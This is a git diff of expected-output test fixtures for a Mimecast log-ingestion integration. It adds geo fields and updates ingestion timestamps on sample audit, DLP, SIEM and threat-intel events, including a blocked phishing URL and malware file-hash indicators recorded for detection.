"{\"id\":\"eNqrVipOTS4tSs1MUbJSCtF28jc2DDLwd_d1NM7ULnLzdnPzdwtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxiCAQ6SsmlxSX5ualFyfkpqUCbnE3MHM1NgcrLUouKM_PzlKwMawGTZipR\",\"auditType\":\"User Password Changed\",\"user\":\"johndoe@example.com\",\"eventTime\":\"2021-10-12T19:56:55+0000\",\"eventInfo\":\"Password reset for user: johndoe@example.com User Password Changed, Remote IP is null\",\"category\":\"user_account_and_role_logs\"}", "id": "eNqrVipOTS4tSs1MUbJSCtF28jc2DDLwd_d1NM7ULnLzdnPzdwtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxiCAQ6SsmlxSX5ualFyfkpqUCbnE3MHM1NgcrLUouKM_PzlKwMawGTZipR" }, @@ -743,11 +947,23 @@ ] }, "client": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "event": { "action": "remediation-incident-adjustment", - "ingested": "2021-12-09T15:16:03.637582900Z", + "ingested": "2021-12-14T14:48:19.342451340Z", "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJSSgwpLctzzah00TbMTTawdC4NDPAzzwlL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxiaGBhoqOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWADOfK6w\",\"auditType\":\"Remediation Incident Adjustment\",\"user\":\"johndoe@example.com\",\"eventTime\":\"2021-10-12T19:49:30+0000\",\"eventInfo\":\"Remediation Incident Created - TR-C46A75-01420-M, type : manual, search criteria : {\\\"fileHash\\\":\\\"9e6011844705292d5abfe0aa38d8aff02f6d8f69689c2e7cb2338f9484774bb3\\\",\\\"start\\\":\\\"2021-09-12T19:48:59+0000\\\",\\\"end\\\":\\\"2021-10-12T19:48:59+0000\\\"}, Date: 2021-10-12, Time: 19:49:30+0000, IP: 67.43.156.15, Application: Administration Console\",\"category\":\"account_logs\"}", "id": "eNqrVipOTS4tSs1MUbJSSgwpLctzzah00TbMTTawdC4NDPAzzwlL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxiaGBhoqOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWADOfK6w", "type": "type : manual", @@ -782,11 +998,23 @@ ] }, "client": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "event": { "action": "archive-mailbox-restore", - "ingested": "2021-12-09T15:16:03.637588800Z", + "ingested": "2021-12-14T14:48:19.342451694Z", "original": "{\"id\":\"eNoVzdEKgjAYQOF3-W8Vaps69S7KooSEJGXSzdAVMtdi04FF757dH77zASvayYi-gxQIcbI0HEtcRI5aRS7SxkN1L7ywzPb1gR3rdxOx_LbKcqYciiXdIe7pczKj02u-VuADn7p-HPTjDxKUkGCdUOxDO9lRK2Fa3YnltA2iDQ2X3Alje_2EFH1_LYQrrw\",\"auditType\":\"Archive Mailbox Restore\",\"user\":\"johndoe@example.com\",\"eventTime\":\"2021-10-12T19:20:01+0000\",\"eventInfo\":\"Archive mailbox restore created. Restored data from johdoe@example.com to johndoe@example.com by johndoe@example.com, Date: 2021-10-12, Time: 19:20:01+0000, IP: 67.43.156.15, Application: Administration Console\",\"category\":\"archive_service_logs\"}", "id": "eNoVzdEKgjAYQOF3-W8Vaps69S7KooSEJGXSzdAVMtdi04FF757dH77zASvayYi-gxQIcbI0HEtcRI5aRS7SxkN1L7ywzPb1gR3rdxOx_LbKcqYciiXdIe7pczKj02u-VuADn7p-HPTjDxKUkGCdUOxDO9lRK2Fa3YnltA2iDQ2X3Alje_2EFH1_LYQrrw", "created": "2021-10-12T19:20:01.000Z" @@ -820,11 +1048,23 @@ ] }, "client": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "event": { "action": "archive-mailbox-restore", - "ingested": "2021-12-09T15:16:03.637594800Z", + "ingested": "2021-12-14T14:48:19.342452056Z", "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJSigzJC_ZNzg-vcjYKcwz3icotC0nVdgtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxiYG5kqaOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAD-SK84\",\"auditType\":\"Archive Mailbox Restore\",\"user\":\"johndoejr@example.com\",\"eventTime\":\"2021-10-12T18:19:33+0000\",\"eventInfo\":\"Archive mailbox restore created. Restored data from johndoe@example.com to johndoejr@example.com by johndoejr@example.com, Date: 2021-10-12, Time: 18:19:33+0000, IP: 67.43.156.15, Application: Administration Console\",\"category\":\"archive_service_logs\"}", "id": "eNqrVipOTS4tSs1MUbJSigzJC_ZNzg-vcjYKcwz3icotC0nVdgtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxiYG5kqaOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAD-SK84", "created": "2021-10-12T18:19:33.000Z" @@ -858,11 +1098,23 @@ ] }, "client": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "event": { "action": "archive-mailbox-export-download", - "ingested": "2021-12-09T15:16:03.637600700Z", + "ingested": "2021-12-14T14:48:19.342452408Z", "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJScjMvyjIxr6yoLDY2qQopLq3yDnM1dwtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxiYGZorKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAE5dK-0\",\"auditType\":\"Archive Mailbox Export Download\",\"user\":\"johndoe@example.com\",\"eventTime\":\"2021-10-12T17:55:14+0000\",\"eventInfo\":\"Mailbox export downloaded. Download filename (HTML Report recovery id): eNqrVipOTS4tSs1MUbJSyo3RDw81rTCpynMpdiuICMopyihxynZztcisDMoN9zWLSCrPzAjz9PALNzFwySrLMNQ2yUs38g9zS860cHKNMExR0lFKLi0uyc9NLUrOT0kFGulsYuZobgoUL0pNzi9LLarULUksztYFWWdpaKqjBBQqzszPU7IyrAUAsSEteA by johndoe@example.com, Date: 2021-10-12, Time: 17:55:14+0000, IP: 67.43.156.15, Application: Administration Console\",\"category\":\"archive_service_logs\"}", "id": "eNqrVipOTS4tSs1MUbJScjMvyjIxr6yoLDY2qQopLq3yDnM1dwtL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxiYGZorKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAE5dK-0", "created": "2021-10-12T17:55:14.000Z" @@ -896,11 +1148,23 @@ ] }, "client": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "event": { "action": "review-set-action", - "ingested": "2021-12-09T15:16:03.637606400Z", + "ingested": "2021-12-14T14:48:19.342452886Z", "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJSitH39gl1cS509PT1MSnw90l0CinPCQgLS_PXNg12dQt3j_QMr4oyi_SO0Xf1jswtM7TINncxTNTO97OsNPQqqAwNU9JRSixNySzJyU8HmWhsaGlsYmBsYqqjlFxaXJKfm1qUnJ-SCrTK2cTM0dwUqLwstag4Mz9PycqwFgAxASul\",\"auditType\":\"Review Set Action\",\"user\":\"johndoe@example.com\",\"eventTime\":\"2021-10-12T17:07:00+0000\",\"eventInfo\":\"Viewed Review Set Details - Case: Class Action, Review Set: Contracts, Date: 2021-10-12, Time: 17:07:00+0000, IP: 67.43.156.15, Application: mimecast-case-review\",\"category\":\"case_review_logs\"}", "id": "eNqrVipOTS4tSs1MUbJSitH39gl1cS509PT1MSnw90l0CinPCQgLS_PXNg12dQt3j_QMr4oyi_SO0Xf1jswtM7TINncxTNTO97OsNPQqqAwNU9JRSixNySzJyU8HmWhsaGlsYmBsYqqjlFxaXJKfm1qUnJ-SCrTK2cTM0dwUqLwstag4Mz9PycqwFgAxASul", "created": "2021-10-12T17:07:00.000Z" @@ -934,11 +1198,23 @@ ] }, "client": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "event": { "action": "remediation-incident-adjustment", - "ingested": "2021-12-09T15:16:03.637611100Z", + "ingested": "2021-12-14T14:48:19.342453242Z", "original": "{\"id\":\"eNqrVipOTS4tSs1MUbJS8vDNLCt0DHEKS4xICvNJqzQ1MjOyyAlL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxsaWJurKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAByMK38\",\"auditType\":\"Remediation Incident Adjustment\",\"user\":\"johndoe@example.com\",\"eventTime\":\"2021-10-12T15:38:05+0000\",\"eventInfo\":\"Restore Remediation Incident Created - TR-C46A75-01419-R, type : restore, search criteria : {\\\"unremediateCode\\\":\\\"TR-C46A75-01419-M\\\",\\\"from\\\":\\\"gmail.com\\\",\\\"start\\\":\\\"2021-10-10T15:33:49+0000\\\",\\\"end\\\":\\\"2021-10-12T15:33:49+0000\\\"}, Date: 2021-10-12, Time: 15:38:05+0000, IP: 67.43.156.15, Application: Administration Console\",\"category\":\"account_logs\"}", "id": "eNqrVipOTS4tSs1MUbJS8vDNLCt0DHEKS4xICvNJqzQ1MjOyyAlL89c2DXZ1C3eP9AyvijKL9I7Rd_WOzC0ztMg2dzFM1M73s6w09CqoDA1T0lFKLE3JLMnJTwcZaGxoaWxsaWJurKOUXFpckp-bWpScn5IKtMnZxMzR3BSovCy1qDgzP0_JyrAWAByMK38", "type": "type : restore", diff --git a/packages/mimecast/data_stream/dlp_logs/_dev/test/pipeline/test-dlp-logs.log-expected.json b/packages/mimecast/data_stream/dlp_logs/_dev/test/pipeline/test-dlp-logs.log-expected.json index 478ae824720..ff154d67416 100644 --- a/packages/mimecast/data_stream/dlp_logs/_dev/test/pipeline/test-dlp-logs.log-expected.json +++ b/packages/mimecast/data_stream/dlp_logs/_dev/test/pipeline/test-dlp-logs.log-expected.json @@ -10,7 +10,7 @@ }, "event": { "action": "hold", - "ingested": "2021-12-09T15:16:05.359023300Z", + "ingested": "2021-12-14T14:48:20.988315125Z", "original": "{\"senderAddress\":\"\u003c\u003e\",\"recipientAddress\":\"johndoe@example.com\",\"subject\":\"Undelivered Mail Returned to Sender\",\"eventTime\":\"2021-10-15T20:41:25+0000\",\"route\":\"inbound\",\"policy\":\"Content Inspection - Watermark\",\"action\":\"hold\",\"messageId\":\"\u003c20211015204122.2CA6DFCAE2@mail.emailsec.ninja\u003e\"}", "created": "2021-10-15T20:41:25+0000" }, @@ -39,7 +39,7 @@ }, "event": { "action": "notification", - "ingested": "2021-12-09T15:16:05.359032800Z", + "ingested": "2021-12-14T14:48:20.988317655Z", "original": "{\"senderAddress\":\"\u003c\u003e\",\"recipientAddress\":\"johndoe@example.com\",\"subject\":\"Undelivered Mail Returned to Sender\",\"eventTime\":\"2021-10-15T20:41:25+0000\",\"route\":\"inbound\",\"policy\":\"Content Inspection - Watermark\",\"action\":\"notification\",\"messageId\":\"\u003c20211015204122.2CA6DFCAE2@mail.emailsec.ninja\u003e\"}", "created": "2021-10-15T20:41:25+0000" }, @@ -68,7 +68,7 @@ }, "event": { "action": "hold", - "ingested": "2021-12-09T15:16:05.359038900Z", + "ingested": "2021-12-14T14:48:20.988318132Z", "original": "{\"senderAddress\":\"\u003c\u003e\",\"recipientAddress\":\"johndoe@example.com\",\"subject\":\"Undelivered Mail Returned to Sender\",\"eventTime\":\"2021-10-15T20:41:22+0000\",\"route\":\"inbound\",\"policy\":\"Content Inspection - Watermark\",\"action\":\"hold\",\"messageId\":\"\u003c20211015204119.F16C2FCC60@mail.emailsec.ninja\u003e\"}", "created": "2021-10-15T20:41:22+0000" }, @@ -97,7 +97,7 @@ }, "event": { "action": "notification", - "ingested": "2021-12-09T15:16:05.359044900Z", + "ingested": "2021-12-14T14:48:20.988318486Z", "original": "{\"senderAddress\":\"\u003c\u003e\",\"recipientAddress\":\"johndoe@example.com\",\"subject\":\"Undelivered Mail Returned to Sender\",\"eventTime\":\"2021-10-15T20:41:22+0000\",\"route\":\"inbound\",\"policy\":\"Content Inspection - Watermark\",\"action\":\"notification\",\"messageId\":\"\u003c20211015204119.F16C2FCC60@mail.emailsec.ninja\u003e\"}", "created": "2021-10-15T20:41:22+0000" }, @@ -126,7 +126,7 @@ }, "event": { "action": "notification", - "ingested": "2021-12-09T15:16:05.359050800Z", + "ingested": "2021-12-14T14:48:20.988318849Z", "original": "{\"senderAddress\":\"\u003c\u003e\",\"recipientAddress\":\"johndoe@example.com\",\"subject\":\"Undelivered Mail Returned to Sender\",\"eventTime\":\"2021-10-15T20:41:21+0000\",\"route\":\"inbound\",\"policy\":\"Content Inspection - Watermark\",\"action\":\"notification\",\"messageId\":\"\u003c20211015204118.05EA6FCAE2@mail.emailsec.ninja\u003e\"}", "created": "2021-10-15T20:41:21+0000" }, @@ -155,7 +155,7 @@ }, "event": { "action": "hold", - "ingested": "2021-12-09T15:16:05.359056700Z", + "ingested": "2021-12-14T14:48:20.988319259Z", "original": "{\"senderAddress\":\"\u003c\u003e\",\"recipientAddress\":\"johndoe@example.com\",\"subject\":\"Undelivered Mail Returned to Sender\",\"eventTime\":\"2021-10-15T20:41:21+0000\",\"route\":\"inbound\",\"policy\":\"Content Inspection - Watermark\",\"action\":\"hold\",\"messageId\":\"\u003c20211015204118.05EA6FCAE2@mail.emailsec.ninja\u003e\"}", "created": "2021-10-15T20:41:21+0000" }, @@ -184,7 +184,7 @@ }, "event": { "action": "notification", - "ingested": "2021-12-09T15:16:05.359062400Z", + "ingested": "2021-12-14T14:48:20.988319668Z", "original": "{\"senderAddress\":\"\u003c\u003e\",\"recipientAddress\":\"johndoe@example.com\",\"subject\":\"Undelivered Mail Returned to Sender\",\"eventTime\":\"2021-10-15T20:41:19+0000\",\"route\":\"inbound\",\"policy\":\"Content Inspection - Watermark\",\"action\":\"notification\",\"messageId\":\"\u003c20211015204116.6A8CFFCC60@mail.emailsec.ninja\u003e\"}", "created": "2021-10-15T20:41:19+0000" }, @@ -213,7 +213,7 @@ }, "event": { "action": "hold", - "ingested": "2021-12-09T15:16:05.359068200Z", + "ingested": "2021-12-14T14:48:20.988320038Z", "original": "{\"senderAddress\":\"\u003c\u003e\",\"recipientAddress\":\"johndoe@example.com\",\"subject\":\"Undelivered Mail Returned to Sender\",\"eventTime\":\"2021-10-15T20:41:19+0000\",\"route\":\"inbound\",\"policy\":\"Content Inspection - Watermark\",\"action\":\"hold\",\"messageId\":\"\u003c20211015204116.6A8CFFCC60@mail.emailsec.ninja\u003e\"}", "created": "2021-10-15T20:41:19+0000" }, @@ -242,7 +242,7 @@ }, "event": { "action": "hold", - "ingested": "2021-12-09T15:16:05.359078400Z", + "ingested": "2021-12-14T14:48:20.988320398Z", "original": "{\"senderAddress\":\"\u003c\u003e\",\"recipientAddress\":\"johndoe@example.com\",\"subject\":\"Undelivered Mail Returned to Sender\",\"eventTime\":\"2021-10-15T20:41:17+0000\",\"route\":\"inbound\",\"policy\":\"Content Inspection - Watermark\",\"action\":\"hold\",\"messageId\":\"\u003c20211015204114.8AE40FCAE2@mail.emailsec.ninja\u003e\"}", "created": "2021-10-15T20:41:17+0000" }, @@ -271,7 +271,7 @@ }, "event": { "action": "notification", - "ingested": "2021-12-09T15:16:05.359084700Z", + "ingested": "2021-12-14T14:48:20.988320761Z", "original": "{\"senderAddress\":\"\u003c\u003e\",\"recipientAddress\":\"johndoe@example.com\",\"subject\":\"Undelivered Mail Returned to Sender\",\"eventTime\":\"2021-10-15T20:41:17+0000\",\"route\":\"inbound\",\"policy\":\"Content Inspection - Watermark\",\"action\":\"notification\",\"messageId\":\"\u003c20211015204114.8AE40FCAE2@mail.emailsec.ninja\u003e\"}", "created": "2021-10-15T20:41:17+0000" }, diff --git a/packages/mimecast/data_stream/siem_logs/_dev/test/pipeline/test-siem-logs.log-expected.json b/packages/mimecast/data_stream/siem_logs/_dev/test/pipeline/test-siem-logs.log-expected.json index 3b0e08ffe44..e5aafa1d00b 100644 --- a/packages/mimecast/data_stream/siem_logs/_dev/test/pipeline/test-siem-logs.log-expected.json +++ b/packages/mimecast/data_stream/siem_logs/_dev/test/pipeline/test-siem-logs.log-expected.json @@ -8,7 +8,7 @@ "event": { "reason": "Spm", "action": "Hld", - "ingested": "2021-12-09T15:16:05.665545500Z", + "ingested": "2021-12-14T14:48:21.314971609Z", "original": "{\"Act\":\"Hld\",\"AttCnt\":0,\"AttNames\":null,\"AttSize\":0,\"Content-Disposition\":\"attachment; filename=\\\"process_20211018093329655.json\\\"\",\"Hld\":\"Spm\",\"MsgId\":\"\\u003cINX.164dae0719be95da77068c7d264.3e915.e7719.c78c.17c926a3231ace@newsletter.77onlineshop.eu\\u003e\",\"MsgSize\":157436,\"Sender\":\"bounce_9244+cdaahhimyaaaaagaad5ekqaaaaaaaaeribenpq@newsletter.77onlineshop.eu\",\"Subject\":\"Hi Sandra! Neue Styles eingetroffen! – Finde deinen Lieblings-Look!\",\"aCode\":\"HhuwRf_AOcuJZINE2ZgcKw\",\"acc\":\"ABC123\",\"datetime\":\"2021-10-18T09:02:43+0100\"}", "created": "2021-10-18T09:02:43+0100", "outcome": "unknown" @@ -37,35 +37,32 @@ } }, { - "rule": { - "name": "Office365" - }, - "source": { - "ip": "67.43.156.15" - }, - "error": { - "type": "Recipient email address is possibly incorrect", - "code": "550" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2021-10-19T06:06:40.000Z", "ecs": { "version": "1.12.0" }, + "rule": { + "name": "Office365" + }, "tls": { "cipher": "TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384", "established": true, "version": "TLSv1.2" }, + "source": { + "ip": "67.43.156.15" + }, "event": { "reason": "5.4.1 Recipient address rejected: Access denied. AS(201806281) [LO2GBR01FT037.eop-gbr01.prod.protection.outlook.com]", - "ingested": "2021-12-09T15:16:05.665550Z", + "ingested": "2021-12-14T14:48:21.314974253Z", "original": "{\"acc\":\"ABC123\",\"Delivered\":false,\"IP\":\"67.43.156.15\",\"RejType\":\"Recipient email address is possibly incorrect\",\"RejCode\":\"550\",\"AttCnt\":0,\"Dir\":\"Inbound\",\"ReceiptAck\":null,\"MsgId\":null,\"Subject\":null,\"Latency\":505,\"Sender\":\"\u003c\u003e\",\"datetime\":\"2021-10-19T07:06:40+0100\",\"Rcpt\":\"johndoe@example.com\",\"AttSize\":0,\"Attempt\":1,\"RejInfo\":\"5.4.1 Recipient address rejected: Access denied. AS(201806281) [LO2GBR01FT037.eop-gbr01.prod.protection.outlook.com]\",\"TlsVer\":\"TLSv1.2\",\"Cphr\":\"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384\",\"Snt\":125,\"aCode\":\"29be076e-44cd-354d-a7c2-083d4a312371\",\"UseTls\":\"Yes\",\"Route\":\"Office365\",\"Content-Disposition\":\"attachment; filename=\\\"delivery_20211018093329655.json\\\"\"}", "created": "2021-10-19T07:06:40+0100", "outcome": "failure" }, + "error": { + "type": "Recipient email address is possibly incorrect", + "code": "550" + }, "email": { "from": { "address": "\u003c\u003e" @@ -81,6 +78,9 @@ "local_id": "29be076e-44cd-354d-a7c2-083d4a312371", "direction": "Inbound" }, + "tags": [ + "preserve_original_event" + ], "mimecast": { "acc": "ABC123", "Snt": 125, @@ -97,7 +97,7 @@ }, "event": { "action": "Acc", - "ingested": "2021-12-09T15:16:05.665553900Z", + "ingested": "2021-12-14T14:48:21.314974698Z", "original": "{\"acc\":\"ABC123\",\"Sender\":\"postmaster@twotoeight.com\",\"datetime\":\"2021-10-19T07:04:55+0100\",\"AttSize\":0,\"Content-Disposition\":\"attachment; filename=\\\"process_20211018093329655.json\\\"\",\"Act\":\"Acc\",\"aCode\":\"61dfe7da-4c6d-34e1-9667-69b04f0d564f\",\"AttCnt\":0,\"AttNames\":null,\"MsgSize\":49025,\"MsgId\":\"\u003c137188507-1634623494888@uk-mta-151.uk.mimecast.lan\u003e\",\"Subject\":\"You have new held messages\"}", "created": "2021-10-19T07:04:55+0100", "outcome": "unknown" @@ -137,7 +137,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T15:16:05.665560600Z", + "ingested": "2021-12-14T14:48:21.314975133Z", "original": "{\"acc\":\"ABC123\",\"Delivered\":true,\"IP\":\"67.43.156.15\",\"AttCnt\":0,\"Dir\":\"Internal\",\"ReceiptAck\":\"250 SmtpInternalThread-19194240-1634623495703@uk-mta-151.uk.mimecast.lan Received OK [61dfe7da-4c6d-34e1-9667-69b04f0d564f.uk151]\",\"MsgId\":\"\u003c137188507-1634623494888@uk-mta-151.uk.mimecast.lan\u003e\",\"Subject\":null,\"Latency\":1090,\"Sender\":\"johndoe@example.com\",\"datetime\":\"2021-10-19T07:04:55+0100\",\"Rcpt\":\"johndoejr@example.com\",\"AttSize\":0,\"Attempt\":1,\"Snt\":51666,\"aCode\":\"61dfe7da-4c6d-34e1-9667-69b04f0d564f\",\"UseTls\":\"No\", \"Content-Disposition\":\"attachment; filename=\\\"delivery_20211018093329655.json\\\"\"},{\"acc\":\"ABC123\",\"Delivered\":false,\"IP\":\"67.43.156.15\",\"RejType\":\"Recipient email address is possibly incorrect\",\"RejCode\":\"550\",\"AttCnt\":0,\"Dir\":\"Internal\",\"ReceiptAck\":null,\"MsgId\":\"\u003c137188507-1634623494888@uk-mta-151.uk.mimecast.lan\u003e\",\"Subject\":\"You have new held messages\",\"Latency\":1534,\"Sender\":\"johndoe@example.com\",\"datetime\":\"2021-10-19T07:04:56+0100\",\"Rcpt\":\"johndoejr@example.com\",\"AttSize\":0,\"Attempt\":1,\"RejInfo\":\"5.4.1 Recipient address rejected: Access denied. AS(201806281) [CWLGBR01FT010.eop-gbr01.prod.protection.outlook.com]\",\"TlsVer\":\"TLSv1.2\",\"Cphr\":\"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384\",\"Snt\":147,\"aCode\":\"61dfe7da-4c6d-34e1-9667-69b04f0d564f\",\"UseTls\":\"Yes\",\"Route\":\"Office365\",\"Content-Disposition\":\"attachment; filename=\\\"delivery_20211018093329655.json\\\"\"}", "created": "2021-10-19T07:04:55+0100", "outcome": "success" @@ -177,7 +177,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T15:16:05.665567200Z", + "ingested": "2021-12-14T14:48:21.314975525Z", "original": "{\"acc\":\"C46A75\",\"Sender\":\"johndoe@example.com\",\"datetime\":\"2021-11-08T12:09:18+0000\",\"Rcpt\":\"o365_service_account@example.com\",\"RcptActType\":\"Jnl\",\"aCode\":\"CYSuuaBUMjOpk3k1Xhvy_Q\",\"Dir\":\"Internal\",\"RcptHdrType\":\"Unknown\", \"Content-Disposition\":\"attachment; filename=\\\"jrnl_20211018093329655.json\\\"\"}", "created": "2021-11-08T12:09:18+0000", "outcome": "unknown" @@ -212,7 +212,7 @@ }, "event": { "action": "Acc", - "ingested": "2021-12-09T15:16:05.665573200Z", + "ingested": "2021-12-14T14:48:21.314975905Z", "original": "{\"acc\":\"C46A75\",\"Sender\":\"johndoe@example.com\",\"datetime\":\"2021-11-08T12:10:19+0000\",\"Rcpt\":\"johndoejr@example.com\",\"Act\":\"Acc\",\"IP\":\"81.2.69.193\",\"aCode\":\"3dbe9918-f91f-3043-b61f-d3164badfe50\",\"Dir\":\"Internal\",\"Subject\":\"You have new held messages\",\"MsgId\":\"\u003c140943948-1636373419265@uk-mta-286.uk.mimecast.lan\u003e\",\"headerFrom\":\"johndoe@example.com\", \"Content-Disposition\":\"attachment; filename=\\\"receipt_20211018093329655.json\\\"\"}", "created": "2021-11-08T12:10:19+0000", "outcome": "unknown" @@ -250,7 +250,7 @@ "event": { "reason": "malicious", "action": "Block", - "ingested": "2021-12-09T15:16:05.665578600Z", + "ingested": "2021-12-14T14:48:21.314976283Z", "original": "{\"acc\":\"C46A75\",\"reason\":\"malicious\",\"subject\":\"DocuSign- Contract #45576744333\",\"msgid\":null,\"url\":\"http:\\/\\/docusign.swrodgods.x10.mx\\/Docun\\/Docu\\/index2.php\",\"datetime\":\"2021-11-29T15:13:58+0000\",\"route\":\"inbound\",\"sourceIp\":\"81.2.69.193\",\"sender\":\"docusign-services@zenz.us\",\"recipient\":\"aorchard@twotoeight.com\",\"action\":\"Block\",\"urlCategory\":\"Phishing \u0026 Fraud\",\"credentialTheft\":null,\"senderDomain\":\"zenz.us\", \"Content-Disposition\":\"attachment; filename=\\\"ttp_url_20211129153015541.json\\\"\"}", "created": "2021-11-29T15:13:58+0000", "outcome": "unknown" diff --git a/packages/mimecast/data_stream/threat_intel_malware_customer/_dev/test/pipeline/test-threat-intel-malware-customer.log-expected.json b/packages/mimecast/data_stream/threat_intel_malware_customer/_dev/test/pipeline/test-threat-intel-malware-customer.log-expected.json index a878745fd1f..a19f6c5a3b2 100644 --- a/packages/mimecast/data_stream/threat_intel_malware_customer/_dev/test/pipeline/test-threat-intel-malware-customer.log-expected.json +++ b/packages/mimecast/data_stream/threat_intel_malware_customer/_dev/test/pipeline/test-threat-intel-malware-customer.log-expected.json @@ -24,7 +24,7 @@ } }, "event": { - "ingested": "2021-12-09T15:16:06.051075700Z", + "ingested": "2021-12-14T14:48:21.740195622Z", "original": "{ \"Content-Disposition\":\"attachment; filename=\\\"malware_customer_stix_20211028161801144.stix\\\"\",\"type\": \"indicator\", \"id\": \"indicator--18c62174-0d31-4653-afe6-d104c57b6b2c\", \"created\": \"2021-10-29T15:07:26.653Z\", \"modified\": \"2021-10-29T15:07:26.653Z\", \"labels\": [ \"malicious-activity\" ], \"pattern\": \"[file:hashes.'SHA-256' = 'c20d551424f2df6312f7fa700ed97cd199c3d5c8a0f4dfd683627f18913096de']\", \"valid_from\": \"2021-10-29T15:07:26.653Z\" }", "category": "threat", "type": "indicator", @@ -69,7 +69,7 @@ } }, "event": { - "ingested": "2021-12-09T15:16:06.051095300Z", + "ingested": "2021-12-14T14:48:21.740196813Z", "original": "{ \"Content-Disposition\":\"attachment; filename=\\\"malware_customer_stix_20211028161801144.stix\\\"\",\"type\": \"indicator\", \"id\": \"indicator--d70d0fc0-7fbe-4acc-9830-230a97ecdab3\", \"created\": \"2021-10-29T15:07:22.595Z\", \"modified\": \"2021-10-29T15:07:22.595Z\", \"labels\": [ \"malicious-activity\" ], \"pattern\": \"[file:hashes.'SHA-256' = '6a6cd489550ddc08871e14dec73f782bf2405378e9f4adeaa61f1574bea4dbbb']\", \"valid_from\": \"2021-10-29T15:07:22.595Z\" }", "category": "threat", "type": "indicator", @@ -114,7 +114,7 @@ } }, "event": { - "ingested": "2021-12-09T15:16:06.051110900Z", + "ingested": "2021-12-14T14:48:21.740197902Z", "original": "{ \"Content-Disposition\":\"attachment; filename=\\\"malware_customer_stix_20211028161801144.stix\\\"\",\"type\": \"indicator\", \"id\": \"indicator--571f0b0a-7206-4a1f-9c5d-9c04e46e0976\", \"created\": \"2021-10-29T15:07:17.538Z\", \"modified\": \"2021-10-29T15:07:17.538Z\", \"labels\": [ \"malicious-activity\" ], \"pattern\": \"[file:hashes.'SHA-256' = '8042d56337b7e7be79688ca861b3c4ba928f95b0824f598ca79e63882dea0668']\", \"valid_from\": \"2021-10-29T15:07:17.538Z\" }", "category": "threat", "type": "indicator", @@ -159,7 +159,7 @@ } }, "event": { - "ingested": "2021-12-09T15:16:06.051126200Z", + "ingested": "2021-12-14T14:48:21.740198966Z", "original": "{ \"Content-Disposition\":\"attachment; filename=\\\"malware_customer_stix_20211028161801144.stix\\\"\",\"type\": \"indicator\", \"id\": \"indicator--90b29bf9-ea1a-423b-8542-4c4590f4038c\", \"created\": \"2021-10-29T15:07:14.044Z\", \"modified\": \"2021-10-29T15:07:14.044Z\", \"labels\": [ \"malicious-activity\" ], \"pattern\": \"[file:hashes.'SHA-256' = 'df086e1fe742f0992ecd2aec8a3a4b5be6023cca5ef8caf1da3d5b67e9359047']\", \"valid_from\": \"2021-10-29T15:07:14.044Z\" }", "category": "threat", "type": "indicator", @@ -204,7 +204,7 @@ } }, "event": { - "ingested": "2021-12-09T15:16:06.051142400Z", + "ingested": "2021-12-14T14:48:21.740200222Z", "original": "{ \"Content-Disposition\":\"attachment; 